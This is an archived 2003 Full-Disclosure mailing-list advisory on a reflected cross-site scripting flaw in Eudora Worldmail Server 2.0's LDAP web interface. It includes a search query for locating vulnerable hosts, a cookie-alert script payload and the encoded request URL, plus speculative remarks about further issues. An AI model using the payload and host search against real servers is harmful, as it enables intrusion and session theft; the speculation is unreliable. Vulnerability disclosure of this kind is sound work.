[Full-Disclosure] Eudora Worldmail Server 2.0 -XSS Injection

From: morning_wood (se_cur_ity_at_hotmail.com)
Date: 08/16/03

  • Next message: -SIMON-: "Re: [Full-Disclosure] east coast powergrid / SCADA [OT?]" 
    To: <full-disclosure@lists.netsys.com>, <bugtraq@securityfocus.com>
Date: Fri, 15 Aug 2003 15:34:58 -0700

    ------------------------------------------------------------------
              - EXPL-A-2003-020 exploitlabs.com Advisory 020
    ------------------------------------------------------------------
                      -= Eudora Worldmail Server 2.0 =-

    Donnie Werner
    Aug 9, 2003

    Product:
    --------
    Eudora Worldmail Server 2.0

    http://www.qualcomm.com/
    http://www.eudora.com/worldmail/

    Vunerability(s):
    ----------------
    1. XSS injection

    Description of product:
    -----------------------
    http://www.eudora.com/worldmail/features.html

    Banner id:

    HTTP/1.0 200 Document follows
    Server: ISOCOR web500gw 2.0.0.3
    MIME-Version: 1.0
    Date: Wednesday, 06-Aug-2003 GMT
    Content-type: text/html

    examples could be found by:

    http://www.google.com/search?num=20&hl=en&lr=&ie=ISO-8859-1&newwindow=1&saf
    e=off&q=Qpam.htm&btnG=Google+Search

    VUNERABILITY / EXPLOIT
    ======================

    Vunerable hosts display the following:

    -------------- snip ----------------------

    A convenient hypertext interface to LDAP and X.500 Directories.

    Local domains and aliases
    Results for: entries at the top level

     Name Description
    Countries
     AE <---------------- example country
     IT
     CA
    --------------- snip --------------------

    Select a country ( "AE" used as example )
    you should see something like the following..

    http://[host]:8888/c%3dAE

    and a search box

    "One-level search in AE:"

    <FORM METHOD=GET ACTION="/c%3dAE">
    <A NAME="search_form">One-level search in</A> <STRONG>AE</STRONG>:<br>
    <INPUT NAME="?O" SIZE=39><INPUT TYPE=submit VALUE="Search">
    <INPUT TYPE=reset VALUE="Clear"></FORM>

    enter sum cool XSS...

    <SCRIPT>alert(document.cookie);</SCRIPT>

    and get

    http://[host]:8888/c%3dAE?%3FO=%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C
    %2FSCRIPT%3E

    the results are rendered by the output of the formatted html.

    yes, it just a non persistant XSS, but this is running as a service on
    port 8888 and is a mail processing server, so there may be other issues
    ( DoS ? ) as well.

    I belive LDAP has some DCOM connectivity, and there could be issues
    with the LDAP...

    SLAPD or X.500 Error: Not found
    An error occurred while searching the SLAPD or X.500 directory
    The error code was 32:

    No such object.
    No additional information is available.Please report errors to the
    Administrator.

    Local:
    ------
    ???

    Remote:
    -------
    yes

    Vendor Fix:
    -----------
    No fix on 0day

    Vendor Contact:
    ---------------
    Concurrent with this advisory
    eudora-custserv@qualcomm.com

    Credits:
    --------

    Donnie Werner
    morning_wood@e2-labs.com
    http://e2-labs.com

    Original at
    http://exploitlabs.com/files/advisories/EXPL-A-2003-020-eudora-worlmail-ser
    ver.txt

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: -SIMON-: "Re: [Full-Disclosure] east coast powergrid / SCADA [OT?]"

    Relevant Pages

    • Re: [Full-disclosure] on xss and its technical merit
      ... In this case 10000 XSS sounds a lot more valuable. ... server running the ftpd daemon) or the data/personal machines of the users ... Keep in mind that many client side exploits are XSS for the browser, ...
      (Full-Disclosure)
    • [NT] LiteServe Directory Index Cross-Site Scripting
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Web, email and FTP server. ... This is similar to the Apache XSS of last month. ...
      (Securiteam)
    • Re: [Full-disclosure] on xss and its technical merit
      ... In this case 10000 XSS sounds a lot more valuable. ... server running the ftpd daemon) or the data/personal machines of the users ... Google Search Interface is as valuable as remotely exploitable buffer ...
      (Full-Disclosure)
    • Re: CSS implication
      ... Although very simular to XSS writting SSI, PHP, or any other kind of server ... but rather a remote file writting vulnerability. ...
      (Vuln-Dev)
    • Re: Does samba 3.0.14Aa on OS 5.0.6 work with ldapsam backend on another LDAP server?
      ... used 3.0.9 on SCO 5.0.6 for quite some time after suffering problems I ... a RedHat4 box running samba 3.0.10 and OpenLDAP 2.2.13. ... and no LDAP server (although there were the ... share on the SCO server without any smbpasswd on that server! ...
      (comp.unix.sco.misc)